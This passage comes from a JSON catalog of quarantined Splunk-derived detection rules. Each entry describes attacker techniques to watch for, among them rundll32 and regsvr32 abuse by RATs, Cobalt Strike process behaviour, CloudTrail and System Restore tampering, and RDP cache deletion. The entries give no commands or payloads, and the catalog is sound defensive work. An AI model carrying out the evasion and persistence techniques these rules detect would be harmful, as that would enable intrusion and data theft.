"Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ami_attribute_modification_for_exfiltration.yml" } }, { "id": "splunk-security-content-f26445a8-a6a2-4855-bec0-0c39e52e5b8f", "type": "detection", "name": "Cisco Secure Firewall - File Download Over Uncommon Port", "description": "The following analytic detects file transfers flagged as malware that occurred over non-standard ports (other than 80 and 443). Adversaries may attempt to bypass protocol-based detection or use alternate ports to blend in with other traffic. This analytic identifies these non-conventional flows and surfaces potential evasion techniques. If confirmed malicious this indicate potential malware delivery or other nefarious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-file-download-over-uncommon-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f26445a8-a6a2-4855-bec0-0c39e52e5b8f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___file_download_over_uncommon_port.yml" } }, { "id": "splunk-security-content-f28e787e-69ca-480e-9f98-ab970e6d4bcc", "type": "detection", "name": "Windows Office Product Spawned Rundll32 With No DLL", "description": "The following analytic detects any Windows Office Product spawning `rundll32.exe` without a `.dll` file extension. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process and parent process relationships. This activity is significant as it is a known tactic of the IcedID malware family, which can lead to unauthorized code execution. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to data exfiltration, system compromise, or further malware deployment. Immediate investigation and containment are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-rundll32-with-no-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f28e787e-69ca-480e-9f98-ab970e6d4bcc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_rundll32_with_no_dll.yml" } }, { "id": "splunk-security-content-f2a1615a-1d63-11ec-97d2-acde48001122", "type": "detection", "name": "Remcos client registry install entry", "description": "The following analytic detects the presence of a registry key associated with the Remcos RAT agent on a host. It leverages data from the Endpoint.Processes and Endpoint.Registry data models in Splunk, focusing on instances where the \"license\" key is found in the \"Software\\Remcos\" path. This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration. If confirmed malicious, the attacker could gain control over the system, steal sensitive information, or use the compromised host for further attacks. Immediate investigation and remediation are required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remcos-client-registry-install-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2a1615a-1d63-11ec-97d2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remcos_client_registry_install_entry.yml" } }, { "id": "splunk-security-content-f2a9df84-9b01-4a21-9e3a-7aa1a217f69e", "type": "detection", "name": "Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI", "description": "This analytic detects suspicious use of 'mshta.exe' or 'rundll32.exe' invoking 'mshtml.dll'\nor the 'RunHTMLApplication' export without including a direct HTTP/HTTPS URL in the command line.\nThis pattern could be associated with obfuscated script execution used by threat actors during\ninitial access or payload staging. The absence of a visible URL may indicate attempts to evade static\ndetections by embedding the URL via string concatenation, encoding (e.g., hex), or indirect script loaders\nlike 'GetObject()'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-mshtml-or-mshta-network-execution-without-url-in-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2a9df84-9b01-4a21-9e3a-7aa1a217f69e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___mshtml_or_mshta_network_execution_without_url_in_cli.yml" } }, { "id": "splunk-security-content-f2cc1584-46ee-485b-b905-977c067f36de", "type": "detection", "name": "Windows Vulnerable 3CX Software", "description": "The following analytic detects instances of the 3CXDesktopApp.exe with a FileVersion of 18.12.x, leveraging Sysmon logs. This detection focuses on identifying vulnerable versions 18.12.407 and 18.12.416 of the 3CX desktop app. Monitoring this activity is crucial as these specific versions have known vulnerabilities that could be exploited by attackers. If confirmed malicious, exploitation of this vulnerability could lead to unauthorized access, code execution, or further compromise of the affected system, posing significant security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-vulnerable-3cx-software.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2cc1584-46ee-485b-b905-977c067f36de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_vulnerable_3cx_software.yml" } }, { "id": "splunk-security-content-f2d1110d-b01c-4a58-9975-90a9edeb083a", "type": "detection", "name": "Linux Auditd File Permissions Modification Via Chattr", "description": "The following analytic detects suspicious file permissions modifications using the chattr command, which may indicate an attacker attempting to manipulate file attributes to evade detection or prevent alteration. The chattr command can be used to make files immutable or restrict deletion, which can be leveraged to protect malicious files or disrupt system operations. By monitoring for unusual or unauthorized chattr usage, this analytic helps identify potential tampering with critical files, enabling security teams to quickly respond to and mitigate threats associated with unauthorized file attribute changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-file-permissions-modification-via-chattr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2d1110d-b01c-4a58-9975-90a9edeb083a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_file_permissions_modification_via_chattr.yml" } }, { "id": "splunk-security-content-f2e08a38-6689-4df4-ad8c-b51c16262316", "type": "detection", "name": "Linux Disable Services", "description": "The following analytic detects attempts to disable a service on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"systemctl,\" \"service,\" and \"svcadm\" with commands containing \"disable.\" This activity is significant as adversaries may disable security or critical services to evade detection and facilitate further malicious actions, such as deploying destructive payloads. If confirmed malicious, this could lead to the termination of essential security services, allowing attackers to persist undetected and potentially cause significant damage to the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-disable-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2e08a38-6689-4df4-ad8c-b51c16262316", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_disable_services.yml" } }, { "id": "splunk-security-content-f308490a-473a-40ef-ae64-dd7a6eba284a", "type": "detection", "name": "Suspicious GPUpdate no Command Line Arguments", "description": "The following analytic detects the execution of gpupdate.exe without any command line arguments. This behavior is identified using data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. It is significant because gpupdate.exe typically runs with specific arguments, and its execution without them is often associated with malicious activities, such as those performed by Cobalt Strike. If confirmed malicious, this activity could indicate an attempt to execute unauthorized commands or scripts, potentially leading to further system compromise or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-gpupdate-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f308490a-473a-40ef-ae64-dd7a6eba284a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-f32598bb-fa5f-4afd-8ab3-0263cc28efbc", "type": "detection", "name": "ASL AWS Disable Bucket Versioning", "description": "The following analytic detects when AWS S3 bucket versioning is suspended by a user. It leverages AWS CloudTrail logs to identify `PutBucketVersioning` events with the `VersioningConfiguration.Status` set to `Suspended`. This activity is significant because disabling versioning can prevent recovery of deleted or modified data, which is a common tactic in ransomware attacks. If confirmed malicious, this action could lead to data loss and hinder recovery efforts, severely impacting data integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-disable-bucket-versioning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f32598bb-fa5f-4afd-8ab3-0263cc28efbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_disable_bucket_versioning.yml" } }, { "id": "splunk-security-content-f36c0d3f-d57f-4b88-a5d4-0a4c9a0752f6", "type": "detection", "name": "Cisco Duo Policy Allow Old Flash", "description": "The following analytic identifies instances where a Duo administrator creates or updates a policy to allow the use of outdated Flash components, specifically by detecting policy changes with the flash_remediation=no remediation attribute. It leverages Duo activity logs ingested via the Cisco Security Cloud App, searching for policy_update or policy_create actions and parsing the policy description for indicators of weakened security controls. This behavior is significant for a SOC because permitting old Flash increases the attack surface, as Flash is widely known for its security vulnerabilities and is no longer supported. Attackers may exploit such policy changes to bypass security controls, introduce malware, or escalate privileges within the environment. Detecting and responding to these policy modifications helps prevent potential exploitation, reduces organizational risk, and ensures adherence to security best practices. Immediate investigation is recommended to determine if the change was authorized or indicative of malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-old-flash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f36c0d3f-d57f-4b88-a5d4-0a4c9a0752f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_old_flash.yml" } }, { "id": "splunk-security-content-f39ee679-3b1e-4f47-841c-5c3c580acda2", "type": "detection", "name": "Windows DLL Search Order Hijacking with iscsicpl", "description": "The following analytic detects DLL search order hijacking involving iscsicpl.exe. It identifies when iscsicpl.exe loads a malicious DLL from a new path, triggering the payload execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on child processes spawned by iscsicpl.exe. This activity is significant as it indicates a potential attempt to execute unauthorized code via DLL hijacking. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-search-order-hijacking-with-iscsicpl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f39ee679-3b1e-4f47-841c-5c3c580acda2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml" } }, { "id": "splunk-security-content-f3e86ff3-b1f9-4382-8924-6913385f1019", "type": "detection", "name": "Windows RDP Cache File Deletion", "description": "This detection identifies the deletion of RDP bitmap cache files\u2014specifically .bmc and .bin files\u2014typically stored in the user profile under the Terminal Server Client\\Cache directory. These files are created by the native Windows Remote Desktop Client (mstsc.exe) and store graphical elements from remote sessions to improve performance. Deleting these files may indicate an attempt to remove forensic evidence of RDP usage. While rare in legitimate user behavior, this action is commonly associated with defense evasion techniques used by attackers or red teamers who wish to hide traces of interactive remote access. When observed in conjunction with recent logon activity, RDP session indicators, or script execution, this behavior should be treated as potentially malicious. Monitoring for deletion of these files provides valuable visibility into anti-forensic actions that often follow lateral movement or hands-on-keyboard activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-cache-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f3e86ff3-b1f9-4382-8924-6913385f1019", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_cache_file_deletion.yml" } }, { "id": "splunk-security-content-f3eb471c-16d0-404d-897c-7653f0a78cba", "type": "detection", "name": "ASL AWS Defense Evasion Update Cloudtrail", "description": "The following analytic detects `UpdateTrail` events within AWS CloudTrail logs, aiming to identify attempts by attackers to evade detection by altering logging configurations. By updating CloudTrail settings with incorrect parameters, such as changing multi-regional logging to a single region, attackers can impair the logging of their activities across other regions. This behavior is crucial for Security Operations Centers (SOCs) to identify, as it indicates an adversary's intent to operate undetected within a compromised AWS environment. The impact of such evasion tactics is significant, potentially allowing malicious activities to proceed without being logged, thereby hindering incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-update-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f3eb471c-16d0-404d-897c-7653f0a78cba", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_update_cloudtrail.yml" } }, { "id": "splunk-security-content-f421c250-24e7-11ec-bc43-acde48001122", "type": "detection", "name": "Regsvr32 Silent and Install Param Dll Loading", "description": "The following analytic detects the loading of a DLL using the regsvr32 application with the silent parameter and DLLInstall execution. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and parent process details. This activity is significant as it is commonly used by RAT malware like Remcos and njRAT to load malicious DLLs on compromised machines. If confirmed malicious, this technique could allow attackers to execute arbitrary code, maintain persistence, and further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/regsvr32-silent-and-install-param-dll-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f421c250-24e7-11ec-bc43-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml" } }, { "id": "splunk-security-content-f443dac2-c7cf-11eb-ab51-acde48001122", "type": "detection", "name": "Excessive number of taskhost processes", "description": "The following analytic identifies an excessive number of taskhost.exe and taskhostex.exe processes running within a short time frame. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and their counts. This behavior is significant as it is commonly associated with post-exploitation tools like Meterpreter and Koadic, which use multiple instances of these processes for actions such as discovery and lateral movement. If confirmed malicious, this activity could indicate an ongoing attack, allowing attackers to execute code, escalate privileges, or move laterally within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-number-of-taskhost-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f443dac2-c7cf-11eb-ab51-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_number_of_taskhost_processes.yml" } }, { "id": "splunk-security-content-f48a5557-be06-4b96-b8e8-be563e387620", "type": "detection", "name": "Windows ESX Admins Group Creation via PowerShell", "description": "This analytic detects attempts to create an \"ESX Admins\" group using PowerShell commands. This activity may indicate an attempt to exploit the VMware ESXi Active Directory Integration Authentication Bypass vulnerability (CVE-2024-37085). Attackers can use this method to gain unauthorized access to ESXi hosts by recreating the 'ESX Admins' group after its deletion from Active Directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.002", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-esx-admins-group-creation-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f48a5557-be06-4b96-b8e8-be563e387620", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_esx_admins_group_creation_via_powershell.yml" } }, { "id": "splunk-security-content-f4bb7321-7e64-4d1e-b1aa-21f8b019a91f", "type": "detection", "name": "Linux Auditd Edit Cron Table Parameter", "description": "The following analytic detects the suspicious editing of cron jobs in Linux using the crontab command-line parameter (-e). It identifies this activity by monitoring command-line executions involving 'crontab' and the edit parameter. This behavior is significant for a SOC as cron job manipulations can indicate unauthorized persistence attempts or scheduled malicious actions. If confirmed malicious, this activity could lead to system compromise, unauthorized access, or broader network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-edit-cron-table-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4bb7321-7e64-4d1e-b1aa-21f8b019a91f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_edit_cron_table_parameter.yml" } }, { "id": "splunk-security-content-f4ca0057-cbf3-44f8-82ea-4e330ee901d3", "type": "detection", "name": "Okta Phishing Detection with FastPass Origin Check", "description": "The following analytic identifies failed user authentication attempts in Okta due to FastPass declining a phishing attempt. It leverages Okta logs, specifically looking for events where multi-factor authentication (MFA) fails with the reason \"FastPass declined phishing attempt.\" This activity is significant as it indicates that attackers are targeting users with real-time phishing proxies, attempting to capture credentials. If confirmed malicious, this could lead to unauthorized access to user accounts, potentially compromising sensitive information and furthering lateral movement within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.001", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-phishing-detection-with-fastpass-origin-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4ca0057-cbf3-44f8-82ea-4e330ee901d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_phishing_detection_with_fastpass_origin_check.yml" } }, { "id": "splunk-security-content-f4cabbc7-c19a-4e41-8be5-98daeaccbb50", "type": "detection", "name": "O365 Compliance Content Search Started", "description": "The following analytic detects when a content search is initiated within the Office 365 Security and Compliance Center. It leverages the SearchCreated operation from the o365_management_activity logs under the SecurityComplianceCenter workload. This activity is significant as it may indicate an attempt to access sensitive organizational data, including emails and documents. If confirmed malicious, this could lead to unauthorized data access, potential data exfiltration, and compliance violations. Monitoring this behavior helps ensure the integrity and security of organizational data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-compliance-content-search-started.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4cabbc7-c19a-4e41-8be5-98daeaccbb50", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_compliance_content_search_started.yml" } }, { "id": "splunk-security-content-f4f837e2-91fb-11eb-8bf6-acde48001122", "type": "detection", "name": "Disabling SystemRestore In Registry", "description": "The following analytic detects the modification of registry keys to disable System Restore on a machine. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with System Restore settings. This activity is significant because disabling System Restore can hinder recovery efforts and is a tactic often used by Remote Access Trojans (RATs) to maintain persistence on an infected system. If confirmed malicious, this action could prevent system recovery, allowing the attacker to sustain their foothold and potentially cause further damage or data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-systemrestore-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4f837e2-91fb-11eb-8bf6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_systemrestore_in_registry.yml" } }, { "id": "splunk-security-content-f5198224-551c-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious msbuild path", "description": "The following analytic detects the execution of msbuild.exe from a non-standard path. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that deviate from typical msbuild.exe locations. This activity is significant because msbuild.exe is commonly abused by attackers to execute malicious code, and running it from an unusual path can indicate an attempt to evade detection. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-msbuild-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5198224-551c-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_msbuild_path.yml" } }, { "id": "splunk-security-content-f52b55ce-41ad-4802-9909-fbd7cc8410a5", "type": "detection", "name": "Windows Rundll32 with Non-Standard File Extension", "description": "This analytic identifies the instance of rundll32.exe process loading a non-standard Windows modules file extension.\nThis behavior is not common and can be associated with malicious activities, such as the Gh0st RAT backdoor. This technique is to evade possible detection by security tools that monitors a suspicious dll loading activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-with-non-standard-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f52b55ce-41ad-4802-9909-fbd7cc8410a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_with_non_standard_file_extension.yml" } }, { "id": "splunk-security-content-f52d2db8-31f9-4aa7-a176-25779effe55c", "type": "detection", "name": "Suspicious SearchProtocolHost no Command Line Arguments", "description": "The following analytic detects instances of searchprotocolhost.exe running without command line arguments.\nThis behavior is unusual and often associated with malicious activities, such as those performed by Cobalt Strike.\nThe detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process execution data.\nThis activity is significant because searchprotocolhost.exe typically runs with specific arguments, and its absence may indicate an attempt to evade detection.\nIf confirmed malicious, this could lead to unauthorized code execution, potential credential dumping, or other malicious actions within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-searchprotocolhost-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f52d2db8-31f9-4aa7-a176-25779effe55c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-f52d5c0b-d45d-4304-b300-a4f6a1130dec", "type": "detection", "name": "Cisco Configuration Archive Logging Analysis", "description": "This analytic provides comprehensive monitoring of configuration changes on Cisco devices by analyzing archive logs. Configuration archive logging captures all changes made to a device's configuration, providing a detailed audit trail that can be used to identify suspicious or malicious activities. This detection is particularly valuable for identifying patterns of malicious configuration changes that might indicate an attacker's presence, such as the creation of backdoor accounts, SNMP community string modifications, and TFTP server configurations for data exfiltration. By analyzing these logs, security teams can gain a holistic view of configuration changes across sessions and users, helping to detect sophisticated attack campaigns like those conducted by threat actors such as Static Tundra.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1098", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 